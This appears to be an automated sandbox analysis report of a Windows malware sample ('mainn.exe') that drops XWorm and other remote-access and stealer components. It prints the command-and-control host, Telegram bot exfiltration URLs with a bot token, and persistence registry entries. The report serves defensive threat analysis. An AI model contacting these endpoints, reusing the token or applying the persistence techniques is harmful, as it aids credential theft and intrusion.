Analysis
-
max time kernel
24s -
max time network
39s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
29-09-2024 15:44
Static task
static1
Behavioral task
behavioral1
Sample
mainn.exe
Resource
win10v2004-20240802-en
General
-
Target
mainn.exe
-
Size
28.1MB
-
MD5
14af5fd5c08fdaa64bb27a27eecef8fa
-
SHA1
64d7140ff222476e9fced02dd280c299ef6a738a
-
SHA256
8cd387950e8bd57026c00d9f9e0ccd17170f6d01bbc9e047f94e802162247755
-
SHA512
6574286fd658c714c212b55c3a9f3d59c614b68bfeb04d543b184377ccd16220e2d430b9c3089f9608b4a54ee66b9f6e84a40cd631d57a3629aa572d5fab229b
-
SSDEEP
786432:SmhBmh9xCGoeWKFD4cOBNvNi7DrhB9V0ADhDX:SIBmAGJWGDgveXhzV0A
Malware Config
Extracted
xworm
reason-warnings.gl.at.ply.gg:20382
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
gurcu
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000900000002344b-13.dat family_xworm behavioral1/memory/4080-29-0x0000000000930000-0x0000000000962000-memory.dmp family_xworm -
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Modifies WinLogon for persistence 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\TextInputHost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\TextInputHost.exe\", \"C:\\Users\\Public\\Music\\RuntimeBroker.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\TextInputHost.exe\", \"C:\\Users\\Public\\Music\\RuntimeBroker.exe\", \"C:\\Users\\Public\\Videos\\wininit.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\TextInputHost.exe\", \"C:\\Users\\Public\\Music\\RuntimeBroker.exe\", \"C:\\Users\\Public\\Videos\\wininit.exe\", \"C:\\Recovery\\WindowsRE\\dllhost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\TextInputHost.exe\", \"C:\\Users\\Public\\Music\\RuntimeBroker.exe\", \"C:\\Users\\Public\\Videos\\wininit.exe\", \"C:\\Recovery\\WindowsRE\\dllhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\cmd.exe\"" ChainComServermonitor.exe -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3840 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4724 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4980 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3772 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5100 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1512 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4504 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4012 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1748 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2548 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2648 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1924 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4020 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2144 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 840 3328 schtasks.exe 95 -
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 4424 created 3444 4424 setup.exe 55 PID 4424 created 3444 4424 setup.exe 55 PID 4424 created 3444 4424 setup.exe 55 PID 4424 created 3444 4424 setup.exe 55 PID 4424 created 3444 4424 setup.exe 55 PID 4424 created 3444 4424 setup.exe 55 -
pid Process 1296 powershell.exe 4956 powershell.exe 4052 powershell.exe 2344 powershell.exe 2824 powershell.exe 320 powershell.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation ChainComServermonitor.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation main.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation Update.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation mainn.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation Build.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation s.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation svchost.exe -
Executes dropped EXE 17 IoCs
pid Process 3504 main.exe 4080 system user.exe 4068 main.exe 5100 Build.exe 3568 hacn.exe 3492 based.exe 436 hacn.exe 1948 based.exe 4560 s.exe 4852 svchost.exe 4416 main.exe 4424 setup.exe 3208 ChainComServermonitor.exe 2472 rar.exe 2664 Update.exe 2696 wininit.exe 2440 updater.exe -
Loads dropped DLL 22 IoCs
pid Process 4068 main.exe 4068 main.exe 436 hacn.exe 436 hacn.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 4416 main.exe 2664 Update.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Public\\Music\\RuntimeBroker.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Users\\Public\\Videos\\wininit.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\WindowsRE\\dllhost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\MSBuild\\cmd.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\MSBuild\\cmd.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Users\\All Users\\TextInputHost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Users\\All Users\\TextInputHost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Public\\Music\\RuntimeBroker.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Users\\Public\\Videos\\wininit.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\WindowsRE\\dllhost.exe\"" ChainComServermonitor.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 26 raw.githubusercontent.com 27 raw.githubusercontent.com 32 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSC53459E939ED4494494129E178E3262D8.TMP csc.exe File created \??\c:\Windows\System32\lcv0ji.exe csc.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 1924 tasklist.exe 5052 tasklist.exe 1636 tasklist.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4424 set thread context of 2632 4424 setup.exe 196 -
resource yara_rule behavioral1/files/0x000700000002345d-36.dat upx behavioral1/memory/4068-41-0x00007FF82A2A0000-0x00007FF82A892000-memory.dmp upx behavioral1/files/0x000700000002345a-51.dat upx behavioral1/files/0x0007000000023459-50.dat upx behavioral1/files/0x0007000000023458-49.dat upx behavioral1/files/0x0007000000023457-48.dat upx behavioral1/files/0x0007000000023456-47.dat upx behavioral1/files/0x000700000002345f-46.dat upx behavioral1/files/0x000700000002345e-45.dat upx behavioral1/files/0x000700000002345c-44.dat upx behavioral1/memory/1948-128-0x00007FF829E40000-0x00007FF82A432000-memory.dmp upx behavioral1/files/0x0007000000023466-132.dat upx behavioral1/memory/1948-150-0x00007FF83DCE0000-0x00007FF83DCEF000-memory.dmp upx behavioral1/files/0x000700000002346a-148.dat upx behavioral1/memory/1948-159-0x00007FF829110000-0x00007FF829133000-memory.dmp upx behavioral1/memory/1948-162-0x00007FF828F90000-0x00007FF82910E000-memory.dmp upx behavioral1/memory/1948-170-0x00007FF843210000-0x00007FF843229000-memory.dmp upx behavioral1/memory/1948-169-0x00007FF82A790000-0x00007FF82A85D000-memory.dmp upx behavioral1/memory/1948-201-0x00007FF82A670000-0x00007FF82A78C000-memory.dmp upx behavioral1/memory/1948-200-0x00007FF83D900000-0x00007FF83D90D000-memory.dmp upx behavioral1/memory/1948-197-0x00007FF8344C0000-0x00007FF8344D4000-memory.dmp upx behavioral1/memory/1948-168-0x00007FF828A60000-0x00007FF828F89000-memory.dmp upx behavioral1/memory/1948-167-0x00007FF82A860000-0x00007FF82A893000-memory.dmp upx behavioral1/memory/1948-166-0x00007FF83DA00000-0x00007FF83DA0D000-memory.dmp upx behavioral1/memory/1948-158-0x00007FF83CFA0000-0x00007FF83CFB9000-memory.dmp upx behavioral1/memory/1948-157-0x00007FF82EAF0000-0x00007FF82EB1D000-memory.dmp upx behavioral1/files/0x000700000002347a-142.dat upx behavioral1/files/0x0007000000023473-138.dat upx behavioral1/files/0x0007000000023472-135.dat upx behavioral1/memory/1948-133-0x00007FF83C9C0000-0x00007FF83C9E4000-memory.dmp upx behavioral1/memory/1948-305-0x00007FF829E40000-0x00007FF82A432000-memory.dmp upx behavioral1/memory/1948-363-0x00007FF83C9C0000-0x00007FF83C9E4000-memory.dmp upx behavioral1/memory/1948-431-0x00007FF828F90000-0x00007FF82910E000-memory.dmp upx behavioral1/memory/1948-430-0x00007FF829110000-0x00007FF829133000-memory.dmp upx behavioral1/memory/1948-455-0x00007FF82A860000-0x00007FF82A893000-memory.dmp upx behavioral1/memory/1948-457-0x00007FF82A790000-0x00007FF82A85D000-memory.dmp upx behavioral1/memory/1948-456-0x00007FF828A60000-0x00007FF828F89000-memory.dmp upx behavioral1/memory/1948-478-0x00007FF843210000-0x00007FF843229000-memory.dmp upx behavioral1/memory/1948-464-0x00007FF83C9C0000-0x00007FF83C9E4000-memory.dmp upx behavioral1/memory/1948-463-0x00007FF829E40000-0x00007FF82A432000-memory.dmp upx behavioral1/memory/1948-850-0x00007FF843210000-0x00007FF843229000-memory.dmp upx behavioral1/memory/1948-864-0x00007FF82A670000-0x00007FF82A78C000-memory.dmp upx behavioral1/memory/1948-863-0x00007FF8344C0000-0x00007FF8344D4000-memory.dmp upx behavioral1/memory/1948-862-0x00007FF82A790000-0x00007FF82A85D000-memory.dmp upx behavioral1/memory/1948-861-0x00007FF828A60000-0x00007FF828F89000-memory.dmp upx behavioral1/memory/1948-860-0x00007FF82A860000-0x00007FF82A893000-memory.dmp upx behavioral1/memory/1948-859-0x00007FF83DA00000-0x00007FF83DA0D000-memory.dmp upx behavioral1/memory/1948-858-0x00007FF828F90000-0x00007FF82910E000-memory.dmp upx behavioral1/memory/1948-857-0x00007FF829110000-0x00007FF829133000-memory.dmp upx behavioral1/memory/1948-856-0x00007FF83CFA0000-0x00007FF83CFB9000-memory.dmp upx behavioral1/memory/1948-855-0x00007FF82EAF0000-0x00007FF82EB1D000-memory.dmp upx behavioral1/memory/1948-854-0x00007FF83DCE0000-0x00007FF83DCEF000-memory.dmp upx behavioral1/memory/1948-853-0x00007FF83C9C0000-0x00007FF83C9E4000-memory.dmp upx behavioral1/memory/1948-852-0x00007FF83D900000-0x00007FF83D90D000-memory.dmp upx behavioral1/memory/1948-851-0x00007FF829E40000-0x00007FF82A432000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\MSBuild\ebf1f9fa8afd6d ChainComServermonitor.exe File created C:\Program Files\Google\Chrome\updater.exe setup.exe File created C:\Program Files (x86)\MSBuild\cmd.exe ChainComServermonitor.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\ServiceState\WinHttpAutoProxySvc\setup.exe ChainComServermonitor.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2444 sc.exe 936 sc.exe 1036 sc.exe 4416 sc.exe 4412 sc.exe -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral1/files/0x000700000002344f-6.dat pyinstaller behavioral1/files/0x0009000000023455-59.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4812 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1176 WMIC.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings ChainComServermonitor.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4552 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4504 schtasks.exe 4012 schtasks.exe 1748 schtasks.exe 2548 schtasks.exe 4980 schtasks.exe 5100 schtasks.exe 1924 schtasks.exe 4020 schtasks.exe 3772 schtasks.exe 2648 schtasks.exe 4340 schtasks.exe 3840 schtasks.exe 4724 schtasks.exe 1512 schtasks.exe 2144 schtasks.exe 840 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4416 main.exe 4416 main.exe 1296 powershell.exe 1296 powershell.exe 320 powershell.exe 320 powershell.exe 2344 powershell.exe 2344 powershell.exe 1296 powershell.exe 320 powershell.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 2344 powershell.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 4956 powershell.exe 4956 powershell.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4080 system user.exe Token: SeDebugPrivilege 4416 main.exe Token: SeDebugPrivilege 1924 tasklist.exe Token: SeDebugPrivilege 5052 tasklist.exe Token: SeDebugPrivilege 3208 ChainComServermonitor.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 4956 powershell.exe Token: SeDebugPrivilege 904 powershell.exe Token: SeIncreaseQuotaPrivilege 1612 WMIC.exe Token: SeSecurityPrivilege 1612 WMIC.exe Token: SeTakeOwnershipPrivilege 1612 WMIC.exe Token: SeLoadDriverPrivilege 1612 WMIC.exe Token: SeSystemProfilePrivilege 1612 WMIC.exe Token: SeSystemtimePrivilege 1612 WMIC.exe Token: SeProfSingleProcessPrivilege 1612 WMIC.exe Token: SeIncBasePriorityPrivilege 1612 WMIC.exe Token: SeCreatePagefilePrivilege 1612 WMIC.exe Token: SeBackupPrivilege 1612 WMIC.exe Token: SeRestorePrivilege 1612 WMIC.exe Token: SeShutdownPrivilege 1612 WMIC.exe Token: SeDebugPrivilege 1612 WMIC.exe Token: SeSystemEnvironmentPrivilege 1612 WMIC.exe Token: SeRemoteShutdownPrivilege 1612 WMIC.exe Token: SeUndockPrivilege 1612 WMIC.exe Token: SeManageVolumePrivilege 1612 WMIC.exe Token: 33 1612 WMIC.exe Token: 34 1612 WMIC.exe Token: 35 1612 WMIC.exe Token: 36 1612 WMIC.exe Token: SeIncreaseQuotaPrivilege 1612 WMIC.exe Token: SeSecurityPrivilege 1612 WMIC.exe Token: SeTakeOwnershipPrivilege 1612 WMIC.exe Token: SeLoadDriverPrivilege 1612 WMIC.exe Token: SeSystemProfilePrivilege 1612 WMIC.exe Token: SeSystemtimePrivilege 1612 WMIC.exe Token: SeProfSingleProcessPrivilege 1612 WMIC.exe Token: SeIncBasePriorityPrivilege 1612 WMIC.exe Token: SeCreatePagefilePrivilege 1612 WMIC.exe Token: SeBackupPrivilege 1612 WMIC.exe Token: SeRestorePrivilege 1612 WMIC.exe Token: SeShutdownPrivilege 1612 WMIC.exe Token: SeDebugPrivilege 1612 WMIC.exe Token: SeSystemEnvironmentPrivilege 1612 WMIC.exe Token: SeRemoteShutdownPrivilege 1612 WMIC.exe Token: SeUndockPrivilege 1612 WMIC.exe Token: SeManageVolumePrivilege 1612 WMIC.exe Token: 33 1612 WMIC.exe Token: 34 1612 WMIC.exe Token: 35 1612 WMIC.exe Token: 36 1612 WMIC.exe Token: SeIncreaseQuotaPrivilege 1200 WMIC.exe Token: SeSecurityPrivilege 1200 WMIC.exe Token: SeTakeOwnershipPrivilege 1200 WMIC.exe Token: SeLoadDriverPrivilege 1200 WMIC.exe Token: SeSystemProfilePrivilege 1200 WMIC.exe Token: SeSystemtimePrivilege 1200 WMIC.exe Token: SeProfSingleProcessPrivilege 1200 WMIC.exe Token: SeIncBasePriorityPrivilege 1200 WMIC.exe Token: SeCreatePagefilePrivilege 1200 WMIC.exe Token: SeBackupPrivilege 1200 WMIC.exe Token: SeRestorePrivilege 1200 WMIC.exe Token: SeShutdownPrivilege 1200 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2664 Update.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4276 wrote to memory of 3504 4276 mainn.exe 82 PID 4276 wrote to memory of 3504 4276 mainn.exe 82 PID 4276 wrote to memory of 4080 4276 mainn.exe 83 PID 4276 wrote to memory of 4080 4276 mainn.exe 83 PID 3504 wrote to memory of 4068 3504 main.exe 84 PID 3504 wrote to memory of 4068 3504 main.exe 84 PID 4068 wrote to memory of 3260 4068 main.exe 85 PID 4068 wrote to memory of 3260 4068 main.exe 85 PID 3260 wrote to memory of 5100 3260 cmd.exe 144 PID 3260 wrote to memory of 5100 3260 cmd.exe 144 PID 3260 wrote to memory of 5100 3260 cmd.exe 144 PID 5100 wrote to memory of 3568 5100 Build.exe 88 PID 5100 wrote to memory of 3568 5100 Build.exe 88 PID 5100 wrote to memory of 3492 5100 Build.exe 90 PID 5100 wrote to memory of 3492 5100 Build.exe 90 PID 3568 wrote to memory of 436 3568 hacn.exe 91 PID 3568 wrote to memory of 436 3568 hacn.exe 91 PID 3492 wrote to memory of 1948 3492 based.exe 92 PID 3492 wrote to memory of 1948 3492 based.exe 92 PID 436 wrote to memory of 868 436 hacn.exe 93 PID 436 wrote to memory of 868 436 hacn.exe 93 PID 868 wrote to memory of 4560 868 cmd.exe 96 PID 868 wrote to memory of 4560 868 cmd.exe 96 PID 868 wrote to memory of 4560 868 cmd.exe 96 PID 4560 wrote to memory of 4852 4560 s.exe 150 PID 4560 wrote to memory of 4852 4560 s.exe 150 PID 4560 wrote to memory of 4852 4560 s.exe 150 PID 4560 wrote to memory of 4416 4560 s.exe 99 PID 4560 wrote to memory of 4416 4560 s.exe 99 PID 1948 wrote to memory of 2632 1948 based.exe 101 PID 1948 wrote to memory of 2632 1948 based.exe 101 PID 1948 wrote to memory of 1796 1948 based.exe 102 PID 1948 wrote to memory of 1796 1948 based.exe 102 PID 1948 wrote to memory of 4092 1948 based.exe 103 PID 1948 wrote to memory of 4092 1948 based.exe 103 PID 4852 wrote to memory of 2072 4852 svchost.exe 108 PID 4852 wrote to memory of 2072 4852 svchost.exe 108 PID 4852 wrote to memory of 2072 4852 svchost.exe 108 PID 4560 wrote to memory of 4424 4560 s.exe 100 PID 4560 wrote to memory of 4424 4560 s.exe 100 PID 1948 wrote to memory of 3844 1948 based.exe 109 PID 1948 wrote to memory of 3844 1948 based.exe 109 PID 1948 wrote to memory of 1200 1948 based.exe 153 PID 1948 wrote to memory of 1200 1948 based.exe 153 PID 1200 wrote to memory of 1924 1200 cmd.exe 152 PID 1200 wrote to memory of 1924 1200 cmd.exe 152 PID 2072 wrote to memory of 2216 2072 WScript.exe 115 PID 2072 wrote to memory of 2216 2072 WScript.exe 115 PID 2072 wrote to memory of 2216 2072 WScript.exe 115 PID 3844 wrote to memory of 5052 3844 cmd.exe 117 PID 3844 wrote to memory of 5052 3844 cmd.exe 117 PID 2632 wrote to memory of 2344 2632 cmd.exe 118 PID 2632 wrote to memory of 2344 2632 cmd.exe 118 PID 1796 wrote to memory of 1296 1796 cmd.exe 140 PID 1796 wrote to memory of 1296 1796 cmd.exe 140 PID 4092 wrote to memory of 320 4092 cmd.exe 120 PID 4092 wrote to memory of 320 4092 cmd.exe 120 PID 2216 wrote to memory of 3208 2216 cmd.exe 121 PID 2216 wrote to memory of 3208 2216 cmd.exe 121 PID 1948 wrote to memory of 2028 1948 based.exe 122 PID 1948 wrote to memory of 2028 1948 based.exe 122 PID 2028 wrote to memory of 4956 2028 cmd.exe 124 PID 2028 wrote to memory of 4956 2028 cmd.exe 124 PID 1948 wrote to memory of 4960 1948 based.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1188
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2828
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
PID:2440
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1400
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1488
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2580
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1596
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1660
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1836
-
